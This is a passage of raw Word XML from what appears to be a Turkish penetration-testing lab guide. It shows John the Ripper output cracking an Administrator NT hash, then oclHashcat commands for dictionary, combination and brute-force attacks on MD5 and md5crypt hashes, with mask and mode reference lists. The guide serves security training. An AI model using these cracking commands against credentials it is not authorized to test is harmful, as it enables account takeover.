      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="2A417164" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C359A9A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@kali:~/Desktop# john --format=nt2  hash.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F78BF6A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Loaded 1 password hash (NT MD4 [128/128 SSE2 intrinsics 12x])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66542B8F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>123              (Administrator)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4617F5EC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>guesses: 1  time: 0:00:00:00 DONE (Tue Feb  3 16:28:58 2015)  c/s: 47100  trying: money - hello</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20424AEF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Use the "--show" option to display all of the cracked passwords reliably</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BA7D681" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DCF026" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F5C11E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>--format=nt2; hash değerinin formatının NTLMv2 olduğu belirtilmiştir, JTR aracına doğru referansın verilmesi parolaların kırılmasını kolaylaştırmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE512C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737CE471" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1954ACC7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc430104861"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:t>OclHashcat Kullanarak Parola Kırma Saldırıları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="00C37FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60750D28" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0586A096" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU tabanlı parola kırma aracı olan oclHashcat+ ile parola kırma. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB40EF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan Araçlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886CB45" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OclHashcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7630E39D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adımlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98FE29" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245B5C1D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OclHashcat kullanarak md5crypt (oclhashcat id=500)parola kırma;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="1D515E5F" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5FE9899E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus64.bin -m 500 hashes.txt wordlist.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="559E3289" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31058B4F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OclHashcat kullanarak MD5 parolayı</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(-m 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) combination saldırı tipi </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(-a 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) ile belirtilen rule kullanarak(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-r</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) kırma ve sonuçları kaydetme(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="678BAECB" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3CBE31DD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus64.bin -m 0 –a 1 hashes.txt wordlist.txt -r rules/best64.rule -o sonuclar –remove</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74BD94D5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2803AF95" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OclHashcat kullanarak MD5 parolayı bruteforce saldırı methodu ve özel oluşturulan karakter ailesi ile(küçük harf,büyük harf,rakam vs.) ile kırma.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="628849BB" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3073B8E0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus64.bin -m 0 –a 3 -1 ?l?d?u?s hashes.txt wordlist.txt -r rules/best64.rule -o sonuclar –remove</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21817B67" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F67EA8B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Simgelerin detayları; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509DC550" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?l = abcdefghijklmnopqrstuvwxyz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA780C7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68042FA7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?d = 0123456789 ?a = ?l?u?d?s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4FFF3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?s = !"#$%&amp;'()*+,-./:;&lt;=&gt;?@[\]^_`{|}~ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFBBE6E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?h = 8 bit characters from 0xc0 - 0xff </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C561CC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?D = 8 bit characters from german alphabet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36458EE0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?F = 8 bit characters from french alphabet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586F0F5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">?R = 8 bit characters from russian alphabet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D6A8B7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1359C8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Saldırı tipleri; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53683DAC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6112DE9A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0 = Straight </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF2A219" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1 = Combination </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16415EFE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3 = Brute-force </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E5FBCE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6 = Hybrid dict + mask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9FD41" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7 = Hybrid mask + dict </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42758446" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31604D38" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash tipleri; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F2460" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A35834" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0 = MD5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237BC139" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10 = md5($pass.$salt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0649F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">20 = md5($salt.$pass) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53111B73" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">30 = md5(unicode($pass).$salt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256F600" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">40 = md5($salt.unicode($pass)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D283510" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">100 = SHA1 </w:t>
